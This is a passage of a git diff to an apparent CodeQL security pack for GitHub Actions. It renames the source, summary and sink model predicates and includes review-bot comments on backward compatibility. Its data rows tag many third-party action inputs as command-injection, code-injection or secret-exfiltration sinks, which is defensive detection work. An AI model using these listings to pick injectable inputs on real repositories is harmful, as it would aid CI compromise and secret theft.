.../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- 
.../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 +- ql/lib/ext/getsentry_action-release.model.yml | 2 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 2 +- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- .../ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 +- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- 
...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 +- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- .../ext/renovatebot_github-action.model.yml | 2 +- .../ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- ...ction-detect-and-tag-new-version.model.yml | 4 +- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 2 +- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 2 +- 
...ss_conventional-changelog-action.model.yml | 2 +- .../tryghost_action-deploy-theme.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 2 +- .../ext/wearerequired_lint-action.model.yml | 2 +- ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 2 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +- ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +- ql/lib/qlpack.yml | 7 +- ql/lib/yaml.dbscheme | 80 ------------------- ql/lib/yaml.dbscheme.stats | 4 - ql/src/codeql-pack.lock.yml | 6 ++ ql/src/qlpack.yml | 3 +- ql/test/codeql-pack.lock.yml | 6 ++ ql/test/library-tests/test.ql | 4 +- ql/test/qlpack.yml | 6 +- 754 files changed, 808 insertions(+), 874 deletions(-) create mode 100644 .!79690!.DS_Store delete mode 100644 ql/lib/yaml.dbscheme delete mode 100644 ql/lib/yaml.dbscheme.stats diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 4b8239b7f6c..c50889c1885 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -1,16 +1,24 @@ --- lockVersion: 1.0.0 dependencies: - codeql/controlflow: - version: 1.0.0 codeql/dataflow: version: 1.0.0 + codeql/javascript-all: + version: 1.0.0 + codeql/mad: + version: 1.0.0 + codeql/regex: + version: 1.0.0 codeql/ssa: version: 1.0.0 + codeql/tutorial: + version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 + codeql/xml: + version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c46a3ee64a1..d0b84f918d5 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
@@ -55,8 +55,8 @@ predicate externallyTriggerableEventsDataModel(string event) {
 * - output arg: To node (prefixed with either `env.` or `output.`)
 * - provenance: verification of the model
 */
-predicate sourceModel(string action, string version, string output, string kind, string provenance) {
- Extensions::sourceModel(action, version, output, kind, provenance)
+predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) {
+ Extensions::actionsSourceModel(action, version, output, kind, provenance)
 }
 
 /**
@@ -69,10 +69,10 @@ predicate sourceModel(string action, string version, string output, string kind,
 * - kind: Either 'Taint' or 'Value'
 * - provenance: verification of the model
 */
-predicate summaryModel(
+predicate actionsSummaryModel(
 string action, string version, string input, string output, string kind, string provenance
 ) {
- Extensions::summaryModel(action, version, input, output, kind, provenance)
+ Extensions::actionsSummaryModel(action, version, input, output, kind, provenance)
 }
 
 /**
@@ -84,13 +84,13 @@ predicate summaryModel(
 * - kind: sink kind
 * - provenance: verification of the model
 */
-predicate sinkModel(string action, string version, string input, string kind, string provenance) {
- Extensions::sinkModel(action, version, input, kind, provenance)
+predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) {
+ Extensions::actionsSinkModel(action, version, input, kind, provenance)
 }
 
 predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) {
 exists(Uses uses, string action, string version, string kind |
- sourceModel(action, version, fieldName, kind, _) and
+ actionsSourceModel(action, version, fieldName, kind, _) and
 uses.getCallee() = action.toLowerCase() and
 (
 if version.trim() = "*"
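Review bot: The three public wrappers `sourceModel`, `summaryModel` and `sinkModel` are renamed in these hunks with no alias left behind, so any query or library outside this file that still calls the old names would no longer resolve them; whether such callers exist is not visible here. If they do, a forwarder such as `deprecated predicate sinkModel(string action, string version, string input, string kind, string provenance) { actionsSinkModel(action, version, input, kind, provenance) }` keeps them working for a release, and the same shape applies to the other two. Separately, the new one-line signatures of `actionsSourceModel` and `actionsSinkModel` are longer than the already wrapped `actionsSummaryModel` signature, so running the QL formatter over the file would keep the three declarations laid out the same way.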
@@ -113,7 +113,7 @@ predicate externallyDefinedStoreStep(
 DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c
 ) {
 exists(Uses uses, string action, string version, string input, string output |
- summaryModel(action, version, input, output, "taint", _) and
+ actionsSummaryModel(action, version, input, output, "taint", _) and
 c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and
 uses.getCallee() = action.toLowerCase() and
 (
@@ -135,7 +135,7 @@ predicate externallyDefinedStoreStep(
 
 predicate externallyDefinedSink(DataFlow::Node sink, string kind) {
 exists(Uses uses, string action, string version, string input |
- sinkModel(action, version, input, kind, _) and
+ actionsSinkModel(action, version, input, kind, _) and
 uses.getCallee() = action.toLowerCase() and
 (
 if input.trim().matches("env.%")
diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
index 6c64b72e6b4..05f71cfc0be 100644
--- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
@@ -5,21 +5,21 @@
 /**
 * Holds if a source model exists for the given parameters.
 */
-extensible predicate sourceModel(
+extensible predicate actionsSourceModel(
 string action, string version, string output, string kind, string provenance
 );
 
 /**
 * Holds if a summary model exists for the given parameters.
 */
-extensible predicate summaryModel(
+extensible predicate actionsSummaryModel(
 string action, string version, string input, string output, string kind, string provenance
 );
 
 /**
 * Holds if a sink model exists for the given parameters.
 */
-extensible predicate sinkModel(
+extensible predicate actionsSinkModel(
 string action, string version, string input, string kind, string provenance
 );
 
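Review bot: The doc comments on the three extensible predicates in `ExternalFlowExtensions.qll` do not say that the predicate name is the value data extension files put in their `extensible:` key, which is exactly what this rename changes. The model files touched by this commit are updated, but a model pack maintained elsewhere that still names `sourceModel`, `summaryModel` or `sinkModel` would presumably stop contributing rows, and that tends to surface as missing sources and sinks rather than as an obvious query failure. I would add to each comment a line such as `* Referenced by name from the "extensible:" key of data extension files that target this pack.` and list the tuple columns there, as the wrappers in `ExternalFlow.qll` already do.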
diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index 67455900ec3..b897e8f2c5a 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml index 0220f0d54d8..3a5b34880b9 100644 --- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml +++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 9b36680af8f..20abd532872 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index fe3c3e58b5f..dcc20433483 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 41b67c2a625..3afd9991e07 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 4d12a293696..3deae2a9f19 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index 7cb2e10e926..7dd0459ab7f 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 83f09bc6bde..721042aafaf 100644 --- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index bdd8a8f77c9..ee4dbaf2b55 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 7e5f5c9ee6a..76ae920d255 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] 
diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 8daa9a9c2b3..46f667d75a0 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 80502e487b8..4df6fe61a43 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index 2a26d31feac..aab329160ea 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index 82e81f55816..610d188f065 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index 58554eb3f61..b571bded8ca 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index ca99210b4c2..cd8f4f73e49 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 1563d95b0b1..6ebc3875e07 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index 2bb6000355d..2b2dbd014b7 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index b0c3419abe9..78b7eb1394c 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index cbe593690e4..0f146da2e0c 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index f29355d4882..483a3bf5172 100644 
--- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index 8463ed9577b..e06e75f7a3b 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index f20a877c3d2..d0a88ff3167 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index e0fe96ff915..a29f84a55b5 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml 
+++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index a7489b68688..0e11fe45b42 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index c0a18c36465..7e0970034a5 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] - ["changesets/action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index 79ed7a80437..2f62f211da9 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index 550b5b854ed..f94ad242321 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index bbe88611259..5872399881c 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index 83b3bc3520d..02c5dcd3cca 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 3b0642fece4..45bf0c57355 100644 
--- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index db55d3c6f3a..4ac3492c41c 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index a4539923b35..a48da0cedfc 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 46226863687..6ca7aa86c06 100644 --- 